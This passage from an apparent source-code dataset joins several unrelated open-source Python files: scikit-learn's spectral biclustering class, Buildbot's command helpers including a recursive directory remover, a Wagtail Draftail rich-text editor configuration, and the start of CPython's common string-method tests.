self.columns_ = np.vstack(self.column_labels_ == c
for c in range(self.n_clusters))
class SpectralBiclustering(BaseSpectral):
"""Spectral biclustering (Kluger, 2003).
Partitions rows and columns under the assumption that the data has
an underlying checkerboard structure. For instance, if there are
two row partitions and three column partitions, each row will
belong to three biclusters, and each column will belong to two
biclusters. The outer product of the corresponding row and column
label vectors gives this checkerboard structure.
Read more in the :ref:`User Guide <spectral_biclustering>`.
Parameters
----------
n_clusters : integer or tuple (n_row_clusters, n_column_clusters)
The number of row and column clusters in the checkerboard
structure.
method : string, optional, default: 'bistochastic'
Method of normalizing and converting singular vectors into
biclusters. May be one of 'scale', 'bistochastic', or 'log'.
The authors recommend using 'log'. If the data is sparse,
however, log normalization will not work, which is why the
default is 'bistochastic'. CAUTION: if `method='log'`, the
data must not be sparse.
n_components : integer, optional, default: 6
Number of singular vectors to check.
n_best : integer, optional, default: 3
Number of best singular vectors to which to project the data
for clustering.
svd_method : string, optional, default: 'randomized'
Selects the algorithm for finding singular vectors. May be
'randomized' or 'arpack'. If 'randomized', uses
`sklearn.utils.extmath.randomized_svd`, which may be faster
for large matrices. If 'arpack', uses
`sklearn.utils.arpack.svds`, which is more accurate, but
possibly slower in some cases.
n_svd_vecs : int, optional, default: None
Number of vectors to use in calculating the SVD. Corresponds
to `ncv` when `svd_method=arpack` and `n_oversamples` when
`svd_method` is 'randomized`.
mini_batch : bool, optional, default: False
Whether to use mini-batch k-means, which is faster but may get
different results.
init : {'k-means++', 'random' or an ndarray}
Method for initialization of k-means algorithm; defaults to
'k-means++'.
n_init : int, optional, default: 10
Number of random initializations that are tried with the
k-means algorithm.
If mini-batch k-means is used, the best initialization is
chosen and the algorithm runs once. Otherwise, the algorithm
is run for each initialization and the best solution chosen.
n_jobs : int, optional, default: 1
The number of jobs to use for the computation. This works by breaking
down the pairwise matrix into n_jobs even slices and computing them in
parallel.
If -1 all CPUs are used. If 1 is given, no parallel computing code is
used at all, which is useful for debugging. For n_jobs below -1,
(n_cpus + 1 + n_jobs) are used. Thus for n_jobs = -2, all CPUs but one
are used.
random_state : int seed, RandomState instance, or None (default)
A pseudo random number generator used by the K-Means
initialization.
Attributes
----------
rows_ : array-like, shape (n_row_clusters, n_rows)
Results of the clustering. `rows[i, r]` is True if
cluster `i` contains row `r`. Available only after calling ``fit``.
columns_ : array-like, shape (n_column_clusters, n_columns)
Results of the clustering, like `rows`.
row_labels_ : array-like, shape (n_rows,)
Row partition labels.
column_labels_ : array-like, shape (n_cols,)
Column partition labels.
References
----------
* Kluger, Yuval, et. al., 2003. `Spectral biclustering of microarray
data: coclustering genes and conditions
<http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.135.1608>`__.
"""
def __init__(self, n_clusters=3, method='bistochastic',
n_components=6, n_best=3, svd_method='randomized',
n_svd_vecs=None, mini_batch=False, init='k-means++',
n_init=10, n_jobs=1, random_state=None):
super(SpectralBiclustering, self).__init__(n_clusters,
svd_method,
n_svd_vecs,
mini_batch,
init,
n_init,
n_jobs,
random_state)
self.method = method
self.n_components = n_components
self.n_best = n_best
def _check_parameters(self):
super(SpectralBiclustering, self)._check_parameters()
legal_methods = ('bistochastic', 'scale', 'log')
if self.method not in legal_methods:
raise ValueError("Unknown method: '{0}'. method must be"
" one of {1}.".format(self.method, legal_methods))
try:
int(self.n_clusters)
except TypeError:
try:
r, c = self.n_clusters
int(r)
int(c)
except (ValueError, TypeError):
raise ValueError("Incorrect parameter n_clusters has value:"
" {}. It should either be a single integer"
" or an iterable with two integers:"
" (n_row_clusters, n_column_clusters)")
if self.n_components < 1:
raise ValueError("Parameter n_components must be greater than 0,"
" but its value is {}".format(self.n_components))
if self.n_best < 1:
raise ValueError("Parameter n_best must be greater than 0,"
" but its value is {}".format(self.n_best))
if self.n_best > self.n_components:
raise ValueError("n_best cannot be larger than"
" n_components, but {} > {}"
"".format(self.n_best, self.n_components))
def _fit(self, X):
n_sv = self.n_components
if self.method == 'bistochastic':
normalized_data = _bistochastic_normalize(X)
n_sv += 1
elif self.method == 'scale':
normalized_data, _, _ = _scale_normalize(X)
n_sv += 1
elif self.method == 'log':
normalized_data = _log_normalize(X)
n_discard = 0 if self.method == 'log' else 1
u, v = self._svd(normalized_data, n_sv, n_discard)
ut = u.T
vt = v.T
try:
n_row_clusters, n_col_clusters = self.n_clusters
except TypeError:
n_row_clusters = n_col_clusters = self.n_clusters
best_ut = self._fit_best_piecewise(ut, self.n_best,
n_row_clusters)
best_vt = self._fit_best_piecewise(vt, self.n_best,
n_col_clusters)
self.row_labels_ = self._project_and_cluster(X, best_vt.T,
n_row_clusters)
self.column_labels_ = self._project_and_cluster(X.T, best_ut.T,
n_col_clusters)
self.rows_ = np.vstack(self.row_labels_ == label
for label in range(n_row_clusters)
for _ in range(n_col_clusters))
self.columns_ = np.vstack(self.column_labels_ == label
for _ in range(n_row_clusters)
for label in range(n_col_clusters))
def _fit_best_piecewise(self, vectors, n_best, n_clusters):
"""Find the ``n_best`` vectors that are best approximated by piecewise
constant vectors.
The piecewise vectors are found by k-means; the best is chosen
according to Euclidean distance.
"""
def make_piecewise(v):
centroid, labels = self._k_means(v.reshape(-1, 1), n_clusters)
return centroid[labels].ravel()
piecewise_vectors = np.apply_along_axis(make_piecewise,
axis=1, arr=vectors)
dists = np.apply_along_axis(norm, axis=1,
arr=(vectors - piecewise_vectors))
result = vectors[np.argsort(dists)[:n_best]]
return result
def _project_and_cluster(self, data, vectors, n_clusters):
"""Project ``data`` to ``vectors`` and cluster the result."""
projected = safe_sparse_dot(data, vectors)
_, labels = self._k_means(projected, n_clusters)
return labels
| bsd-3-clause |
denny820909/builder | lib/python2.7/site-packages/buildbot_slave-0.8.8-py2.7.egg/buildslave/commands/utils.py | 4 | 3936 | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
import os
from twisted.python import log
from twisted.python.procutils import which
from twisted.python import runtime
def getCommand(name):
possibles = which(name)
if not possibles:
raise RuntimeError("Couldn't find executable for '%s'" % name)
#
# Under windows, if there is more than one executable "thing"
# that matches (e.g. *.bat, *.cmd and *.exe), we not just use
# the first in alphabet (*.bat/*.cmd) if there is a *.exe.
# e.g. under MSysGit/Windows, there is both a git.cmd and a
# git.exe on path, but we want the git.exe, since the git.cmd
# does not seem to work properly with regard to errors raised
# and catched in buildbot slave command (vcs.py)
#
if runtime.platformType == 'win32' and len(possibles) > 1:
possibles_exe = which(name + ".exe")
if possibles_exe:
return possibles_exe[0]
return possibles[0]
# this just keeps pyflakes happy on non-Windows systems
if runtime.platformType != 'win32':
WindowsError = RuntimeError
if runtime.platformType == 'win32':
def rmdirRecursive(dir):
"""This is a replacement for shutil.rmtree that works better under
windows. Thanks to Bear at the OSAF for the code."""
if not os.path.exists(dir):
return
if os.path.islink(dir) or os.path.isfile(dir):
os.remove(dir)
return
# Verify the directory is read/write/execute for the current user
os.chmod(dir, 0700)
# os.listdir below only returns a list of unicode filenames if the parameter is unicode
# Thus, if a non-unicode-named dir contains a unicode filename, that filename will get garbled.
# So force dir to be unicode.
if not isinstance(dir, unicode):
try:
dir = unicode(dir, "utf-8")
except:
log.err("rmdirRecursive: decoding from UTF-8 failed (ignoring)")
try:
list = os.listdir(dir)
except WindowsError, e:
msg = ("rmdirRecursive: unable to listdir %s (%s). Trying to "
"remove like a dir" % (dir, e.strerror.decode('mbcs')))
log.msg(msg.encode('utf-8'))
os.rmdir(dir)
return
for name in list:
full_name = os.path.join(dir, name)
# on Windows, if we don't have write permission we can't remove
# the file/directory either, so turn that on
if os.name == 'nt':
if not os.access(full_name, os.W_OK):
# I think this is now redundant, but I don't have an NT
# machine to test on, so I'm going to leave it in place
# -warner
os.chmod(full_name, 0600)
if os.path.islink(full_name):
os.remove(full_name) # as suggested in bug #792
elif os.path.isdir(full_name):
rmdirRecursive(full_name)
else:
if os.path.isfile(full_name):
os.chmod(full_name, 0700)
os.remove(full_name)
os.rmdir(dir)
else:
# use rmtree on POSIX
import shutil
rmdirRecursive = shutil.rmtree
| mit |
gasman/wagtaildraftail | tests/testapp/testapp/grains/rich_text.py | 2 | 4646 | from __future__ import absolute_import, unicode_literals
from draftjs_exporter.constants import BLOCK_TYPES, ENTITY_TYPES, INLINE_STYLES
from draftjs_exporter.defaults import BLOCK_MAP
TERMS_BLOCK_ID = 'TERMS_AND_CONDITIONS_TEXT'
DRAFT_BLOCK_TYPE_H3 = {'label': 'H3', 'type': BLOCK_TYPES.HEADER_THREE}
DRAFT_BLOCK_TYPE_H4 = {'label': 'H4', 'type': BLOCK_TYPES.HEADER_FOUR}
DRAFT_BLOCK_TYPE_UL = {'label': 'UL', 'type': BLOCK_TYPES.UNORDERED_LIST_ITEM, 'icon': 'icon-list-ul'}
DRAFT_BLOCK_TYPE_OL = {'label': 'OL', 'type': BLOCK_TYPES.ORDERED_LIST_ITEM, 'icon': 'icon-list-ol'}
DRAFT_BLOCK_TYPE_TERMS = {'label': 'T&Cs', 'type': TERMS_BLOCK_ID, 'element': 'div', 'class': 'legals'}
DRAFT_INLINE_STYLE_BOLD = {'label': 'Bold', 'type': INLINE_STYLES.BOLD, 'icon': 'icon-bold'}
DRAFT_INLINE_STYLE_ITALIC = {'label': 'Italic', 'type': INLINE_STYLES.ITALIC, 'icon': 'icon-italic'}
# It accepts a list of dicts with `label` and `value` keys (e.g. `{'label': 'Full width', 'value': 'fullwidth'}`)
# or a special `__all__` value which will be intercepted and will load all image formats known to Wagtail.
DRAFT_IMAGE_FORMATS = '__all__'
DRAFT_ENTITY_TYPE_IMAGE = {
'label': 'Image',
'type': ENTITY_TYPES.IMAGE,
'icon': 'icon-image',
'imageFormats': DRAFT_IMAGE_FORMATS,
'source': 'ImageSource',
'decorator': 'Image',
}
DRAFT_ENTITY_TYPE_EMBED = {
'label': 'Embed',
'type': ENTITY_TYPES.EMBED,
'icon': 'icon-media',
'source': 'EmbedSource',
'decorator': 'Embed',
}
DRAFT_ENTITY_TYPE_LINK = {
'label': 'Link',
'type': ENTITY_TYPES.LINK,
'icon': 'icon-link',
'source': 'LinkSource',
'decorator': 'Link',
}
DRAFT_ENTITY_TYPE_DOCUMENT = {
'label': 'Document',
'type': ENTITY_TYPES.DOCUMENT,
'icon': 'icon-doc-full',
'source': 'DocumentSource',
'decorator': 'Document',
}
BUTTON_ENTITY_ID = 'BUTTON'
DRAFT_ENTITY_TYPE_BUTTON = {
'label': 'Button',
'type': BUTTON_ENTITY_ID,
'icon': 'icon-link',
'source': 'LinkSource',
'decorator': 'ButtonDecorator',
}
WAGTAILADMIN_RICH_TEXT_EDITORS = {
'simple': {
'WIDGET': 'wagtaildraftail.widgets.DraftailTextArea',
'OPTIONS': {
'enableHorizontalRule': True,
'enableLineBreak': False,
'entityTypes': [
DRAFT_ENTITY_TYPE_LINK,
DRAFT_ENTITY_TYPE_DOCUMENT,
],
'blockTypes': [
DRAFT_BLOCK_TYPE_H3,
DRAFT_BLOCK_TYPE_UL,
DRAFT_BLOCK_TYPE_TERMS,
],
'inlineStyles': [
DRAFT_INLINE_STYLE_BOLD,
DRAFT_INLINE_STYLE_ITALIC,
],
}
},
'default_draftail': {
'WIDGET': 'wagtaildraftail.widgets.DraftailTextArea',
'OPTIONS': {
'enableHorizontalRule': True,
'enableLineBreak': False,
'entityTypes': [
DRAFT_ENTITY_TYPE_IMAGE,
DRAFT_ENTITY_TYPE_EMBED,
DRAFT_ENTITY_TYPE_LINK,
DRAFT_ENTITY_TYPE_DOCUMENT,
DRAFT_ENTITY_TYPE_BUTTON,
],
'blockTypes': [
DRAFT_BLOCK_TYPE_H3,
DRAFT_BLOCK_TYPE_H4,
DRAFT_BLOCK_TYPE_UL,
DRAFT_BLOCK_TYPE_OL,
DRAFT_BLOCK_TYPE_TERMS,
],
'inlineStyles': [
DRAFT_INLINE_STYLE_BOLD,
DRAFT_INLINE_STYLE_ITALIC,
],
}
},
# Wagtail dependencies
'default': {
'WIDGET': 'wagtail.wagtailadmin.rich_text.HalloRichTextArea'
},
'custom': {
'WIDGET': 'wagtail.tests.testapp.rich_text.CustomRichTextArea'
},
}
DRAFT_EXPORTER_ENTITY_DECORATORS = {
ENTITY_TYPES.LINK: 'wagtaildraftail.decorators.Link',
ENTITY_TYPES.DOCUMENT: 'wagtaildraftail.decorators.Document',
ENTITY_TYPES.IMAGE: 'wagtaildraftail.decorators.Image',
ENTITY_TYPES.EMBED: 'wagtaildraftail.decorators.Embed',
ENTITY_TYPES.HORIZONTAL_RULE: 'wagtaildraftail.decorators.HR',
BUTTON_ENTITY_ID: 'home.decorators.Button',
}
DRAFT_EXPORTER_COMPOSITE_DECORATORS = [
'wagtaildraftail.decorators.BR',
]
DRAFT_EXPORTER_BLOCK_MAP = dict(BLOCK_MAP, **{
BLOCK_TYPES.UNORDERED_LIST_ITEM: {
'element': 'li',
'wrapper': 'ul',
'wrapper_props': {'class': 'list-styled'},
},
BLOCK_TYPES.ORDERED_LIST_ITEM: {
'element': 'li',
'wrapper': 'ol',
'wrapper_props': {'class': 'list-numbered'},
},
TERMS_BLOCK_ID: {
'element': 'p',
'props': {'class': 'legals'},
},
})
| mit |
Voluntarynet/BitmessageKit | BitmessageKit/Vendor/static-python/Lib/test/string_tests.py | 38 | 63594 | """
Common tests shared by test_str, test_unicode, test_userstring and test_string.
"""
import unittest, string, sys, struct
from test import test_support
from UserList import UserList
import _testcapi
class Sequence:
def __init__(self, seq='wxyz'): self.seq = seq
def __len__(self): return len(self.seq)
def __getitem__(self, i): return self.seq[i]
class BadSeq1(Sequence):
def __init__(self): self.seq = [7, 'hello', 123L]
class BadSeq2(Sequence):
def __init__(self): self.seq = ['a', 'b', 'c']
def __len__(self): return 8
class CommonTest(unittest.TestCase):
# This testcase contains test that can be used in all
# stringlike classes. Currently this is str, unicode
# UserString and the string module.
# The type to be tested
# Change in subclasses to change the behaviour of fixtesttype()
type2test = None
# All tests pass their arguments to the testing methods
# as str objects. fixtesttype() can be used to propagate
# these arguments to the appropriate type
def fixtype(self, obj):
if isinstance(obj, str):
return self.__class__.type2test(obj)
elif isinstance(obj, list):
return [self.fixtype(x) for x in obj]
elif isinstance(obj, tuple):
return tuple([self.fixtype(x) for x in obj])
elif isinstance(obj, dict):
return dict([
(self.fixtype(key), self.fixtype(value))
for (key, value) in obj.iteritems()
])
else:
return obj
# check that object.method(*args) returns result
def checkequal(self, result, object, methodname, *args):
result = self.fixtype(result)
object = self.fixtype(object)
args = self.fixtype(args)
realresult = getattr(object, methodname)(*args)
self.assertEqual(
result,
realresult
)
# if the original is returned make sure that
# this doesn't happen with subclasses
if object == realresult:
class subtype(self.__class__.type2test):
pass
object = subtype(object)
realresult = getattr(object, methodname)(*args)
self.assertTrue(object is not realresult)
# check that object.method(*args) raises exc
def checkraises(self, exc, object, methodname, *args):
object = self.fixtype(object)
args = self.fixtype(args)
self.assertRaises(
exc,
getattr(object, methodname),
*args
)
# call object.method(*args) without any checks
def checkcall(self, object, methodname, *args):
object = self.fixtype(object)
args = self.fixtype(args)
getattr(object, methodname)(*args)
def test_hash(self):
# SF bug 1054139: += optimization was not invalidating cached hash value
a = self.type2test('DNSSEC')
b = self.type2test('')
for c in a:
b += c
hash(b)
self.assertEqual(hash(a), hash(b))
def test_capitalize(self):
self.checkequal(' hello ', ' hello ', 'capitalize')
self.checkequal('Hello ', 'Hello ','capitalize')
self.checkequal('Hello ', 'hello ','capitalize')
self.checkequal('Aaaa', 'aaaa', 'capitalize')
self.checkequal('Aaaa', 'AaAa', 'capitalize')
self.checkraises(TypeError, 'hello', 'capitalize', 42)
def test_count(self):
self.checkequal(3, 'aaa', 'count', 'a')
self.checkequal(0, 'aaa', 'count', 'b')
self.checkequal(3, 'aaa', 'count', 'a')
self.checkequal(0, 'aaa', 'count', 'b')
self.checkequal(3, 'aaa', 'count', 'a')
self.checkequal(0, 'aaa', 'count', 'b')
self.checkequal(0, 'aaa', 'count', 'b')
self.checkequal(2, 'aaa', 'count', 'a', 1)
self.checkequal(0, 'aaa', 'count', 'a', 10)
self.checkequal(1, 'aaa', 'count', 'a', -1)
self.checkequal(3, 'aaa', 'count', 'a', -10)
self.checkequal(1, 'aaa', 'count', 'a', 0, 1)
self.checkequal(3, 'aaa', 'count', 'a', 0, 10)
self.checkequal(2, 'aaa', 'count', 'a', 0, -1)
self.checkequal(0, 'aaa', 'count', 'a', 0, -10)
self.checkequal(3, 'aaa', 'count', '', 1)
self.checkequal(1, 'aaa', 'count', '', 3)
self.checkequal(0, 'aaa', 'count', '', 10)
self.checkequal(2, 'aaa', 'count', '', -1)
self.checkequal(4, 'aaa', 'count', '', -10)
self.checkequal(1, '', 'count', '')
self.checkequal(0, '', 'count', '', 1, 1)
self.checkequal(0, '', 'count', '', sys.maxint, 0)
self.checkequal(0, '', 'count', 'xx')
self.checkequal(0, '', 'count', 'xx', 1, 1)
self.checkequal(0, '', 'count', 'xx', sys.maxint, 0)
self.checkraises(TypeError, 'hello', 'count')
self.checkraises(TypeError, 'hello', 'count', 42)
# For a variety of combinations,
# verify that str.count() matches an equivalent function
# replacing all occurrences and then differencing the string lengths
charset = ['', 'a', 'b']
digits = 7
base = len(charset)
teststrings = set()
for i in xrange(base ** digits):
entry = []
for j in xrange(digits):
i, m = divmod(i, base)
entry.append(charset[m])
teststrings.add(''.join(entry))
teststrings = list(teststrings)
for i in teststrings:
i = self.fixtype(i)
n = len(i)
for j in teststrings:
r1 = i.count(j)
if j:
r2, rem = divmod(n - len(i.replace(j, '')), len(j))
else:
r2, rem = len(i)+1, 0
if rem or r1 != r2:
self.assertEqual(rem, 0, '%s != 0 for %s' % (rem, i))
self.assertEqual(r1, r2, '%s != %s for %s' % (r1, r2, i))
def test_find(self):
self.checkequal(0, 'abcdefghiabc', 'find', 'abc')
self.checkequal(9, 'abcdefghiabc', 'find', 'abc', 1)
self.checkequal(-1, 'abcdefghiabc', 'find', 'def', 4)
self.checkequal(0, 'abc', 'find', '', 0)
self.checkequal(3, 'abc', 'find', '', 3)
self.checkequal(-1, 'abc', 'find', '', 4)
# to check the ability to pass None as defaults
self.checkequal( 2, 'rrarrrrrrrrra', 'find', 'a')
self.checkequal(12, 'rrarrrrrrrrra', 'find', 'a', 4)
self.checkequal(-1, 'rrarrrrrrrrra', 'find', 'a', 4, 6)
self.checkequal(12, 'rrarrrrrrrrra', 'find', 'a', 4, None)
self.checkequal( 2, 'rrarrrrrrrrra', 'find', 'a', None, 6)
self.checkraises(TypeError, 'hello', 'find')
self.checkraises(TypeError, 'hello', 'find', 42)
self.checkequal(0, '', 'find', '')
self.checkequal(-1, '', 'find', '', 1, 1)
self.checkequal(-1, '', 'find', '', sys.maxint, 0)
self.checkequal(-1, '', 'find', 'xx')
self.checkequal(-1, '', 'find', 'xx', 1, 1)
self.checkequal(-1, '', 'find', 'xx', sys.maxint, 0)
# issue 7458
self.checkequal(-1, 'ab', 'find', 'xxx', sys.maxsize + 1, 0)
# For a variety of combinations,
# verify that str.find() matches __contains__
# and that the found substring is really at that location
charset = ['', 'a', 'b', 'c']
digits = 5
base = len(charset)
teststrings = set()
for i in xrange(base ** digits):
entry = []
for j in xrange(digits):
i, m = divmod(i, base)
entry.append(charset[m])
teststrings.add(''.join(entry))
teststrings = list(teststrings)
for i in teststrings:
i = self.fixtype(i)
for j in teststrings:
loc = i.find(j)
r1 = (loc != -1)
r2 = j in i
self.assertEqual(r1, r2)
if loc != -1:
self.assertEqual(i[loc:loc+len(j)], j)
def test_rfind(self):
self.checkequal(9, 'abcdefghiabc', 'rfind', 'abc')
self.checkequal(12, 'abcdefghiabc', 'rfind', '')
self.checkequal(0, 'abcdefghiabc', 'rfind', 'abcd')
self.checkequal(-1, 'abcdefghiabc', 'rfind', 'abcz')
self.checkequal(3, 'abc', 'rfind', '', 0)
self.checkequal(3, 'abc', 'rfind', '', 3)
self.checkequal(-1, 'abc', 'rfind', '', 4)
# to check the ability to pass None as defaults
self.checkequal(12, 'rrarrrrrrrrra', 'rfind', 'a')
self.checkequal(12, 'rrarrrrrrrrra', 'rfind', 'a', 4)
self.checkequal(-1, 'rrarrrrrrrrra', 'rfind', 'a', 4, 6)
self.checkequal(12, 'rrarrrrrrrrra', 'rfind', 'a', 4, None)
self.checkequal( 2, 'rrarrrrrrrrra', 'rfind', 'a', None, 6)
self.checkraises(TypeError, 'hello', 'rfind')
self.checkraises(TypeError, 'hello', 'rfind', 42)
# For a variety of combinations,
# verify that str.rfind() matches __contains__
# and that the found substring is really at that location
charset = ['', 'a', 'b', 'c']
digits = 5
base = len(charset)
teststrings = set()
for i in xrange(base ** digits):
entry = []
for j in xrange(digits):
i, m = divmod(i, base)
entry.append(charset[m])
teststrings.add(''.join(entry))
teststrings = list(teststrings)
for i in teststrings:
i = self.fixtype(i)
for j in teststrings:
loc = i.rfind(j)
r1 = (loc != -1)
r2 = j in i
self.assertEqual(r1, r2)
if loc != -1:
self.assertEqual(i[loc:loc+len(j)], self.fixtype(j))
# issue 7458
self.checkequal(-1, 'ab', 'rfind', 'xxx', sys.maxsize + 1, 0)
def test_index(self):
self.checkequal(0, 'abcdefghiabc', 'index', '')
self.checkequal(3, 'abcdefghiabc', 'index', 'def')
self.checkequal(0, 'abcdefghiabc', 'index', 'abc')
self.checkequal(9, 'abcdefghiabc', 'index', 'abc', 1)
self.checkraises(ValueError, 'abcdefghiabc', 'index', 'hib')
self.checkraises(ValueError, 'abcdefghiab', 'index', 'abc', 1)
self.checkraises(ValueError, 'abcdefghi', 'index', 'ghi', 8)
self.checkraises(ValueError, 'abcdefghi', 'index', 'ghi', -1)
# to check the ability to pass None as defaults
self.checkequal( 2, 'rrarrrrrrrrra', 'index', 'a')
self.checkequal(12, 'rrarrrrrrrrra', 'index', 'a', 4)
self.checkraises(ValueError, 'rrarrrrrrrrra', 'index', 'a', 4, 6)
self.checkequal(12, 'rrarrrrrrrrra', 'index', 'a', 4, None)
self.checkequal( 2, 'rrarrrrrrrrra', 'index', 'a', None, 6)
self.checkraises(TypeError, 'hello', 'index')
self.checkraises(TypeError, 'hello', 'index', 42)
def test_rindex(self):
self.checkequal(12, 'abcdefghiabc', 'rindex', '')
self.checkequal(3, 'abcdefghiabc', 'rindex', 'def')
self.checkequal(9, 'abcdefghiabc', 'rindex', 'abc')
self.checkequal(0, 'abcdefghiabc', 'rindex', 'abc', 0, -1)
self.checkraises(ValueError, 'abcdefghiabc', 'rindex', 'hib')
self.checkraises(ValueError, 'defghiabc', 'rindex', 'def', 1)
self.checkraises(ValueError, 'defghiabc', 'rindex', 'abc', 0, -1)
self.checkraises(ValueError, 'abcdefghi', 'rindex', 'ghi', 0, 8)
self.checkraises(ValueError, 'abcdefghi', 'rindex', 'ghi', 0, -1)
# to check the ability to pass None as defaults
self.checkequal(12, 'rrarrrrrrrrra', 'rindex', 'a')
self.checkequal(12, 'rrarrrrrrrrra', 'rindex', 'a', 4)
self.checkraises(ValueError, 'rrarrrrrrrrra', 'rindex', 'a', 4, 6)
self.checkequal(12, 'rrarrrrrrrrra', 'rindex', 'a', 4, None)
self.checkequal( 2, 'rrarrrrrrrrra', 'rindex', 'a', None, 6)
self.checkraises(TypeError, 'hello', 'rindex')
self.checkraises(TypeError, 'hello', 'rindex', 42)
def test_lower(self):
self.checkequal('hello', 'HeLLo', 'lower')
self.checkequal('hello', 'hello', 'lower')
self.checkraises(TypeError, 'hello', 'lower', 42)
def test_upper(self):
self.checkequal('HELLO', 'HeLLo', 'upper')
self.checkequal('HELLO', 'HELLO', 'upper')
self.checkraises(TypeError, 'hello', 'upper', 42)
def test_expandtabs(self):
self.checkequal('abc\rab def\ng hi', 'abc\rab\tdef\ng\thi', 'expandtabs')
self.checkequal('abc\rab def\ng hi', 'abc\rab\tdef\ng\thi', 'expandtabs', 8)
self.checkequal('abc\rab def\ng hi', 'abc\rab\tdef\ng\thi', 'expandtabs', 4)
self.checkequal('abc\r\nab def\ng hi', 'abc\r\nab\tdef\ng\thi', 'expandtabs', 4)
self.checkequal('abc\rab def\ng hi', 'abc\rab\tdef\ng\thi', 'expandtabs')
self.checkequal('abc\rab def\ng hi', 'abc\rab\tdef\ng\thi', 'expandtabs', 8)
self.checkequal('abc\r\nab\r\ndef\ng\r\nhi', 'abc\r\nab\r\ndef\ng\r\nhi', 'expandtabs', 4)
self.checkequal(' a\n b', ' \ta\n\tb', 'expandtabs', 1)
self.checkraises(TypeError, 'hello', 'expandtabs', 42, 42)
# This test is only valid when sizeof(int) == sizeof(void*) == 4.
if sys.maxint < (1 << 32) and struct.calcsize('P') == 4:
self.checkraises(OverflowError,
'\ta\n\tb', 'expandtabs', sys.maxint)
def test_split(self):
self.checkequal(['this', 'is', 'the', 'split', 'function'],
'this is the split function', 'split')
# by whitespace
self.checkequal(['a', 'b', 'c', 'd'], 'a b c d ', 'split')
self.checkequal(['a', 'b c d'], 'a b c d', 'split', None, 1)
self.checkequal(['a', 'b', 'c d'], 'a b c d', 'split', None, 2)
self.checkequal(['a', 'b', 'c', 'd'], 'a b c d', 'split', None, 3)
self.checkequal(['a', 'b', 'c', 'd'], 'a b c d', 'split', None, 4)
self.checkequal(['a', 'b', 'c', 'd'], 'a b c d', 'split', None,
sys.maxint-1)
self.checkequal(['a b c d'], 'a b c d', 'split', None, 0)
self.checkequal(['a b c d'], ' a b c d', 'split', None, 0)
self.checkequal(['a', 'b', 'c d'], 'a b c d', 'split', None, 2)
self.checkequal([], ' ', 'split')
self.checkequal(['a'], ' a ', 'split')
self.checkequal(['a', 'b'], ' a b ', 'split')
self.checkequal(['a', 'b '], ' a b ', 'split', None, 1)
self.checkequal(['a', 'b c '], ' a b c ', 'split', None, 1)
self.checkequal(['a', 'b', 'c '], ' a b c ', 'split', None, 2)
self.checkequal(['a', 'b'], '\n\ta \t\r b \v ', 'split')
aaa = ' a '*20
self.checkequal(['a']*20, aaa, 'split')
self.checkequal(['a'] + [aaa[4:]], aaa, 'split', None, 1)
self.checkequal(['a']*19 + ['a '], aaa, 'split', None, 19)
# by a char
self.checkequal(['a', 'b', 'c', 'd'], 'a|b|c|d', 'split', '|')
self.checkequal(['a|b|c|d'], 'a|b|c|d', 'split', '|', 0)
self.checkequal(['a', 'b|c|d'], 'a|b|c|d', 'split', '|', 1)
self.checkequal(['a', 'b', 'c|d'], 'a|b|c|d', 'split', '|', 2)
self.checkequal(['a', 'b', 'c', 'd'], 'a|b|c|d', 'split', '|', 3)
self.checkequal(['a', 'b', 'c', 'd'], 'a|b|c|d', 'split', '|', 4)
self.checkequal(['a', 'b', 'c', 'd'], 'a|b|c|d', 'split', '|',
sys.maxint-2)
self.checkequal(['a|b|c|d'], 'a|b|c|d', 'split', '|', 0)
self.checkequal(['a', '', 'b||c||d'], 'a||b||c||d', 'split', '|', 2)
self.checkequal(['endcase ', ''], 'endcase |', 'split', '|')
self.checkequal(['', ' startcase'], '| startcase', 'split', '|')
self.checkequal(['', 'bothcase', ''], '|bothcase|', 'split', '|')
self.checkequal(['a', '', 'b\x00c\x00d'], 'a\x00\x00b\x00c\x00d', 'split', '\x00', 2)
self.checkequal(['a']*20, ('a|'*20)[:-1], 'split', '|')
self.checkequal(['a']*15 +['a|a|a|a|a'],
('a|'*20)[:-1], 'split', '|', 15)
# by string
self.checkequal(['a', 'b', 'c', 'd'], 'a//b//c//d', 'split', '//')
self.checkequal(['a', 'b//c//d'], 'a//b//c//d', 'split', '//', 1)
self.checkequal(['a', 'b', 'c//d'], 'a//b//c//d', 'split', '//', 2)
self.checkequal(['a', 'b', 'c', 'd'], 'a//b//c//d', 'split', '//', 3)
self.checkequal(['a', 'b', 'c', 'd'], 'a//b//c//d', 'split', '//', 4)
self.checkequal(['a', 'b', 'c', 'd'], 'a//b//c//d', 'split', '//',
sys.maxint-10)
self.checkequal(['a//b//c//d'], 'a//b//c//d', 'split', '//', 0)
self.checkequal(['a', '', 'b////c////d'], 'a////b////c////d', 'split', '//', 2)
self.checkequal(['endcase ', ''], 'endcase test', 'split', 'test')
self.checkequal(['', ' begincase'], 'test begincase', 'split', 'test')
self.checkequal(['', ' bothcase ', ''], 'test bothcase test',
'split', 'test')
self.checkequal(['a', 'bc'], 'abbbc', 'split', 'bb')
self.checkequal(['', ''], 'aaa', 'split', 'aaa')
self.checkequal(['aaa'], 'aaa', 'split', 'aaa', 0)
self.checkequal(['ab', 'ab'], 'abbaab', 'split', 'ba')
self.checkequal(['aaaa'], 'aaaa', 'split', 'aab')
self.checkequal([''], '', 'split', 'aaa')
self.checkequal(['aa'], 'aa', 'split', 'aaa')
self.checkequal(['A', 'bobb'], 'Abbobbbobb', 'split', 'bbobb')
self.checkequal(['A', 'B', ''], 'AbbobbBbbobb', 'split', 'bbobb')
self.checkequal(['a']*20, ('aBLAH'*20)[:-4], 'split', 'BLAH')
self.checkequal(['a']*20, ('aBLAH'*20)[:-4], 'split', 'BLAH', 19)
self.checkequal(['a']*18 + ['aBLAHa'], ('aBLAH'*20)[:-4],
'split', 'BLAH', 18)
# mixed use of str and unicode
self.checkequal([u'a', u'b', u'c d'], 'a b c d', 'split', u' ', 2)
# argument type
self.checkraises(TypeError, 'hello', 'split', 42, 42, 42)
# null case
self.checkraises(ValueError, 'hello', 'split', '')
self.checkraises(ValueError, 'hello', 'split', '', 0)
